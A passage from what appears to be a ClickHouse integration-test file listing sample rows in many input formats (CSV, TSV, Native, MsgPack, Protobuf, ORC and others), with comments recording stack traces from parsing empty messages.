'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe